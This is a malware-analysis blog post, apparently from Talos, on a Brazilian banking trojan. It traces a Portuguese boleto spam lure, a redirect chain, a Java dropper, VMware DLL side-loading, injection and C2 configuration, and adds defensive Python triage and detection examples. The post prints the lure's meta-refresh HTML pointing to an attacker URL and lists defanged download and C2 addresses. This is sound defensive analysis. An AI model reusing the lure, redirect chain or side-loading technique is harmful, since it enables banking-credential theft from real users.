Banking Trojan Attempts To Steal Brazillion$

2017-09-28T08:09:00
ID TALOSBLOG:3096DAA5EA04377DDBA74CE6DA546AEA
Type talosblog
Reporter noreply@blogger.com (Warren Mercer)
Modified 2017-10-12T06:59:25

Description

This post was authored by <a href="https://www.twitter.com/SecurityBeard/">Warren Mercer</a>, <a href="https://www.twitter.com/r00tbsd">Paul Rascagneres</a> and <a href="https://twitter.com/vanjasvajcer">Vanja Svajcer</a><br /><br /><h2 id="h.nnz5k5mrj4as">Introduction</h2><br />Banking trojans are among the biggest threats to everyday users, as they directly cause the user financial loss. Talos recently observed a new campaign specific to South America, namely Brazil. The campaign targeted various South American banks in an attempt to steal credentials from the user for the illicit financial gain of the malicious actors. The campaign Talos analysed focused on Brazilian users and also attempted to remain stealthy by chaining multiple redirections before infecting the victim machine. It also used multiple anti-analysis techniques, and the final payload was written in Delphi, which is unusual in the banking trojan landscape.<br /><br /><h2 id="h.gy10kqw5mmko">Infection Vector</h2><h3 id="h.hc0d0iga1b1a">Spam Example</h3><br />As with many banking trojan campaigns, this one starts with a malicious spam campaign. Here is an example of an email used during this campaign. 
The attacker used an email written in Portuguese, which makes it seem more legitimate to the user: receiving email in a native language gives the attackers a higher likelihood of achieving their objective, convincing the victim to open the malicious attachment.<br /><br /><a href="http://3.bp.blogspot.com/-YExZ87Jga64/Wc0K2xrYCCI/AAAAAAAAAVY/B0NjGvX98v0WOmtfWDwy8jZhvTNYZ32YACK4BGAYYCw/s1600/image2.png" imageanchor="1"><img border="0" height="298" src="https://3.bp.blogspot.com/-YExZ87Jga64/Wc0K2xrYCCI/AAAAAAAAAVY/B0NjGvX98v0WOmtfWDwy8jZhvTNYZ32YACK4BGAYYCw/s640/image2.png" width="640" /></a><br /><br />The email contains an HTML attachment named BOLETO_2248_.html; a Boleto is a type of invoice used in Brazil. The HTML document contains nothing but a simple redirection to a first website:<br /><br /><pre>&lt;html&gt;<br />&lt;head&gt;<br />&lt;title&gt;2Via Boleto&lt;/title&gt;<br />&lt;/head&gt;<br />&lt;body&gt;<br />&lt;/body&gt;<br />&lt;/html&gt;<br />&lt;meta http-equiv="refresh" content="0; url=http://priestsforscotland[.]org[.]uk/wp-content/themes/blessing/0032904.php"&gt;<br /></pre><br />Note that the meta refresh is placed after the closing html tag; browsers tolerate this and still follow it, whereas a naive parser that stops at the end of the document would miss it.<br /><br /><h3 id="h.r71kjddgikf5">Redirection, Redirection and… Redirection</h3><br />The URL contained in the HTML attachment is a first redirect to a goo.gl URL shortener:<br /><br /><a href="http://1.bp.blogspot.com/-ZSAl-KV1OJ0/Wc0K7PPdbtI/AAAAAAAAAVg/NEW-D6R1TFEK3HuROjASEPalD48O5kdbgCK4BGAYYCw/s1600/image5.jpg" imageanchor="1"><img border="0" height="328" src="https://1.bp.blogspot.com/-ZSAl-KV1OJ0/Wc0K7PPdbtI/AAAAAAAAAVg/NEW-D6R1TFEK3HuROjASEPalD48O5kdbgCK4BGAYYCw/s640/image5.jpg" width="640" /></a><br /><br />A second redirect is performed by the goo.gl URL. 
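Before following the chain further, here is an added triage check for attachments of this kind (example code, not from the Talos post): a stdlib-only Python parser that pulls the meta-refresh target even when it sits after the closing html tag and flags documents that render no body text yet immediately refresh to an external URL. The sample body is re-typed from the attachment shown above with its defanged URL; the class and function names are assumptions of this example.

```python
# Added example, not code from the Talos post: stdlib-only triage for an
# HTML attachment that exists only to meta-refresh the reader elsewhere.
from html.parser import HTMLParser

# Constructed sample: the BOLETO_2248_.html body from the post (defanged URL).
SAMPLE_ATTACHMENT = """<html><head><title>2Via Boleto</title></head>
<body></body></html>
<meta http-equiv="refresh" content="0; url=http://priestsforscotland[.]org[.]uk/wp-content/themes/blessing/0032904.php">
"""


class RefreshFinder(HTMLParser):
    """Collects meta-refresh targets (even after </html>) and counts visible <body> text."""

    def __init__(self):
        super().__init__()
        self.targets = []       # list of (delay_seconds, url)
        self.visible_chars = 0
        self._in_body = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}   # HTMLParser lowercases names
        if tag == "body":
            self._in_body = True
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            delay, _, rest = a.get("content", "").partition(";")
            url = rest.strip()
            if url.lower().startswith("url="):
                url = url[4:].strip().strip("'\"")
            # A missing or malformed delay is treated as an immediate refresh.
            secs = float(delay) if delay.strip().isdigit() else 0.0
            self.targets.append((secs, url))

    def handle_endtag(self, tag):
        if tag == "body":
            self._in_body = False

    def handle_data(self, data):
        if self._in_body:
            self.visible_chars += len(data.strip())


def triage_attachment(html_text):
    """Return (verdict, urls); 'redirect-only' means no visible body text and an
    immediate refresh to an external http(s) URL, which is what this lure does."""
    p = RefreshFinder()
    p.feed(html_text)
    external = [u for secs, u in p.targets
                if secs == 0 and u.lower().startswith(("http://", "https://"))]
    if external and p.visible_chars == 0:
        return "redirect-only", external
    return "review", [u for _, u in p.targets]
```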
This shortened URL points to hxxp://thirdculture[.]tv:80/wp/wp-content/themes/zerif-lite/97463986909837214092129.rar.<br /><br /><a href="http://4.bp.blogspot.com/-kEg_wPVzRj0/Wc0LS4gxZZI/AAAAAAAAAVo/m3gp7TaQCmEPaMrPwMVEljn1mJtHcvlrgCK4BGAYYCw/s1600/image6.jpg" imageanchor="1"><img border="0" height="280" src="https://4.bp.blogspot.com/-kEg_wPVzRj0/Wc0LS4gxZZI/AAAAAAAAAVo/m3gp7TaQCmEPaMrPwMVEljn1mJtHcvlrgCK4BGAYYCw/s640/image6.jpg" width="640" /></a><br /><br />Finally, the archive contains a JAR file named BOLETO_09848378974093798043.jar. If the user double-clicks the JAR file, Java executes the malicious code and starts the installation of this banking trojan.<br /><br /><h3 id="h.857zq1ntm7si">Java Execution</h3><br />The first step of the Java code is to set up the malware's working environment and to download additional files from hxxp://104[.]236[.]211[.]243/1409/pz.zip. The malware works in the C:\Users\Public\Administrator\ directory, which it creates, as this is not a default folder. The new archive contains a new set of binaries. <br /><br /><a href="http://3.bp.blogspot.com/-6nfsCdP51KM/Wc0LbLbTakI/AAAAAAAAAVw/22RqIF1mWs4c002ed0_klMnjdEenNt48gCK4BGAYYCw/s1600/image7.png" imageanchor="1"><img border="0" height="520" src="https://3.bp.blogspot.com/-6nfsCdP51KM/Wc0LbLbTakI/AAAAAAAAAVw/22RqIF1mWs4c002ed0_klMnjdEenNt48gCK4BGAYYCw/s640/image7.png" width="640" /></a><br /><br />In the last step, the Java code renames the downloaded binaries and executes vm.png (one of the files just renamed):<br /><br /><a href="http://4.bp.blogspot.com/-RpJStbo3-5E/Wc0Lds2qIVI/AAAAAAAAAV4/jgiVunLyH2wmo99dczVrGXi-WxB4y56aQCK4BGAYYCw/s1600/image8.png" imageanchor="1"><img border="0" height="70" src="https://4.bp.blogspot.com/-RpJStbo3-5E/Wc0Lds2qIVI/AAAAAAAAAV4/jgiVunLyH2wmo99dczVrGXi-WxB4y56aQCK4BGAYYCw/s640/image8.png" width="640" /></a><br /><br /><h2 id="h.h1woiklnbe54">Malware Loading</h2><br />The first executed binary is vm.png. 
It's a legitimate binary from VMware and is signed with a VMware digital signature.<br /><br /><a href="http://2.bp.blogspot.com/-Ur43h2-lC3o/Wc0Lg0AnzjI/AAAAAAAAAWA/3f2s7YTn_CYgsroQMc3bqsEI-hGglOjnwCK4BGAYYCw/s1600/image4.png" imageanchor="1"><img border="0" height="542" src="https://2.bp.blogspot.com/-Ur43h2-lC3o/Wc0Lg0AnzjI/AAAAAAAAAWA/3f2s7YTn_CYgsroQMc3bqsEI-hGglOjnwCK4BGAYYCw/s640/image4.png" width="640" /></a><br /><br />One of the dependencies of the binary is vmwarebase.dll, as the import table shows:<br /><br /><pre>Python 2.7.12 (default, Nov 19 2016, 06:48:10)<br />[GCC 5.4.0 20160609] on linux2<br />Type "help", "copyright", "credits" or "license" for more information.<br />&gt;&gt;&gt; import pefile<br />&gt;&gt;&gt; pe = pefile.PE("vm.png")<br />&gt;&gt;&gt; for entry in pe.DIRECTORY_ENTRY_IMPORT:<br />...     print entry.dll<br />...<br />MSVCR90.dll<br />ADVAPI32.dll<br />vmwarebase.DLL<br />KERNEL32.dll<br /></pre>The vmwarebase.dll found next to vm.png is not the legitimate library but a malicious one. This technique, commonly called DLL side-loading, has been used previously, for example by PlugX. The idea behind this approach is that some security products have the following trust chain: if a first binary is trusted (vm.png in our case), the libraries it loads are automatically trusted. The loading technique can therefore bypass some security checks.<br /><br />The purpose of the vmwarebase.dll code is to inject and execute the prs.png code in explorer.exe or in notepad.exe, depending on the context of the user account. The injection is performed by allocating memory in the remote process and using LoadLibrary() to load the gbs.png library. 
The API usage is obfuscated by encryption (AES):<br /><br /><a href="http://2.bp.blogspot.com/-Qr-KdnPBVr4/Wc0Lu3t_nDI/AAAAAAAAAWI/2biU21Ieyt0KxlyRt3pf2aSGLvSFT6EcACK4BGAYYCw/s1600/image3.png" imageanchor="1"><img border="0" height="360" src="https://2.bp.blogspot.com/-Qr-KdnPBVr4/Wc0Lu3t_nDI/AAAAAAAAAWI/2biU21Ieyt0KxlyRt3pf2aSGLvSFT6EcACK4BGAYYCw/s640/image3.png" width="640" /></a><br /><br />Once decrypted, <i>m5ba+5jOiltH7Mff7neiMumHl2s=</i> is LoadLibraryA and <i>QiF3gn1jEEw8XUGBTz0B5i5nkPY=</i> is kernel32.dll.<br /><br /><h2 id="h.krt68nmkeqmx">Banking Trojan</h2><br />The main module of the banking trojan contains many features. For example, it attempts to terminate analysis processes such as taskmgr.exe (Task Manager), msconfig.exe (MsConfig), regedit.exe (Registry Editor), <a href="http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html">ccleaner.exe</a> and <a href="http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html">ccleaner64.exe</a>. This module also creates an autostart registry key under a legitimate-looking name: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Vmware Base.<br /><br />This module is also used to get the title of the window in the user's foreground. The purpose is to identify whether the user has a window with one of the following titles (these strings are encrypted in the sample):<br /><br />Navegador Exclusivo Sicoobnet Aplicativo Ita Internet Banking BNB Banestes Internet Banking Banrisul bb.com.br bancobrasil.com Banco do Brasil Autoatendimento Pessoa Física - Banco do Brasil internetbankingcaixa Caixa - A vida pede mais que um banco SICREDI Banco Bradesco S/A Internet Banking 30 horas Banestes Internet Banking Banrisul <br /><br />This list contains the targeted financial institutions, all located in Brazil. The trojan leverages web injects to interact with the banking website. 
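Added example, not code from the Talos post: host-side detection rules for the loading chain and persistence described above, run over constructed Sysmon-style events. The working directory, file names and the Run key value name come from the post; the event dicts, the field names (ProcessSigned, DllSigned, Details), the Run value data and the rule names are assumptions of this example.

```python
# Added example, not code from the Talos post: detection rules for the
# loading chain it describes, run over constructed Sysmon-style events.
# Event IDs follow Sysmon (1 process create, 7 image load, 13 registry
# value set); the dict fields and sample values are made up for this demo.
import ntpath

USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
WORK_DIR = "c:\\users\\public\\administrator\\"   # non-default dir the dropper creates

# Constructed sample telemetry (not real logs).
EVENTS = [
    {"id": 1, "Image": r"C:\Users\Public\Administrator\vm.png", "ProcessSigned": True},
    {"id": 7, "Image": r"C:\Users\Public\Administrator\vm.png", "ProcessSigned": True,
     "ImageLoaded": r"C:\Users\Public\Administrator\vmwarebase.dll", "DllSigned": False},
    {"id": 7, "Image": r"C:\Program Files\VMware\vmware.exe", "ProcessSigned": True,
     "ImageLoaded": r"C:\Program Files\VMware\vmwarebase.dll", "DllSigned": True},
    {"id": 13, "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Vmware Base",
     "Details": r"C:\Users\Public\Administrator\vm.png"},   # value data is assumed
]


def in_user_writable(path):
    return path.lower().startswith(USER_WRITABLE)


def detect(event):
    """Return the names of the rules this single event matches."""
    hits = []
    img = event.get("Image", "")
    if event["id"] == 1 and img.lower().startswith(WORK_DIR):
        hits.append("exec-from-public-administrator")
    if event["id"] == 7:
        dll = event.get("ImageLoaded", "")
        # Side-loading pattern: a signed EXE pulls an unsigned DLL from its own
        # user-writable directory instead of from the vendor install location.
        same_dir = ntpath.dirname(img).lower() == ntpath.dirname(dll).lower()
        if (event.get("ProcessSigned") and not event.get("DllSigned")
                and same_dir and in_user_writable(dll)):
            hits.append("signed-exe-sideloads-unsigned-dll")
    if event["id"] == 13:
        key = event.get("TargetObject", "").lower()
        if "\\currentversion\\run\\" in key and in_user_writable(event.get("Details", "")):
            hits.append("run-key-points-to-user-writable-path")
    return hits


def scan(events):
    """Map event index to matched rules, keeping only events that matched."""
    return {i: detect(e) for i, e in enumerate(events) if detect(e)}
```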
Another task performed by this main module is to execute the last binary, gps.png (previously renamed with the .drv extension), with rundll32.exe:<br /><br /><a href="http://2.bp.blogspot.com/-ELDyshdwoB0/Wc0MJ77bG-I/AAAAAAAAAWQ/-PHDf1ljHxQNrm19gvFImPLAGQ7tMGLtgCK4BGAYYCw/s1600/image1.png" imageanchor="1"><img border="0" height="316" src="https://2.bp.blogspot.com/-ELDyshdwoB0/Wc0MJ77bG-I/AAAAAAAAAWQ/-PHDf1ljHxQNrm19gvFImPLAGQ7tMGLtgCK4BGAYYCw/s640/image1.png" width="640" /></a><br /><br />This library is packed using Themida, which made it significantly more difficult to unpack.<br /><br />The developer left the following debug strings in the samples analysed. The strings are in Portuguese:<br /><br /><pre>&lt;|DISPIDA|&gt;Iniciou!<br />&lt;|PRINCIPAL|&gt;<br />&lt;|DISPIDA|&gt;Abriu_IE<br />&lt;|Desktop|&gt;<br />&lt;|DISPIDA|&gt;Startou!<br />&lt;|Enviado|&gt;<br /></pre>These strings are sent to the C2 server when specific actions are performed on the infected system. The C2 configuration is stored in the file i.dk, which is encrypted with AES-256; once decrypted it is plain text containing a date, an IP address and additional configuration items:<br /><br /><pre>07082017<br />191.252.65.139<br />6532<br /></pre><h2 id="h.g3jygwb5fn45">Conclusion</h2><br />Banking trojans continue to form part of the threat landscape; they continually evolve and can, as in this specific example, be very specific to the region they attack. This does not necessarily mean the attackers are from that region; rather, they may have decided that users living there are perhaps less security conscious. Financial gain will continue to be a huge motivator for attackers, and as this sample shows, the malware continues to evolve. 
Using commercial packing platforms like Themida will continue to make analysis difficult for analysts, and shows that some attackers are willing to obtain these commercial packers in an attempt to thwart analysis.<br /><br /><h2 id="h.kek0ptqaghy">Coverage</h2><br />Additional ways our customers can detect and block this threat are listed below.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-Z7N_NdAXg5w/Wd5A326hmcI/AAAAAAAAAag/Hei3WfxVMeU6-7g_SRAoSjyoAn8q1wHIwCLcBGAs/s1600/image10.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="268" data-original-width="320" src="https://3.bp.blogspot.com/-Z7N_NdAXg5w/Wd5A326hmcI/AAAAAAAAAag/Hei3WfxVMeU6-7g_SRAoSjyoAn8q1wHIwCLcBGAs/s1600/image10.png" /></a></div>Advanced Malware Protection (<a href="https://www.cisco.com/c/en/us/products/security/advanced-malware-protection">AMP</a>) is ideally suited to prevent the execution of the malware used by these threat actors.<br /><br /><a href="https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html">CWS</a> or <a href="https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html">WSA</a> web scanning prevents access to malicious websites and detects malware used in these attacks.<br /><br /><a href="https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html">Email Security</a> can block malicious emails sent by threat actors as part of their campaign.<br /><br />Network Security appliances such as <a href="https://www.cisco.com/c/en/us/products/security/firewalls/index.html">NGFW</a>, <a href="https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html">NGIPS</a>, and <a href="https://meraki.cisco.com/products/appliances">Meraki MX</a> can detect malicious activity associated with this threat.<br /><br /><a href="https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html">AMP Threat Grid</a> helps identify malicious binaries and build protection into all Cisco Security products.<br /><br /><a href="https://umbrella.cisco.com/">Umbrella</a>, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.<br /><br />Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on <a href="https://www.snort.org/products">Snort.org</a>.<br /><br /><h2 id="h.690931o0tz4r">IOCs</h2>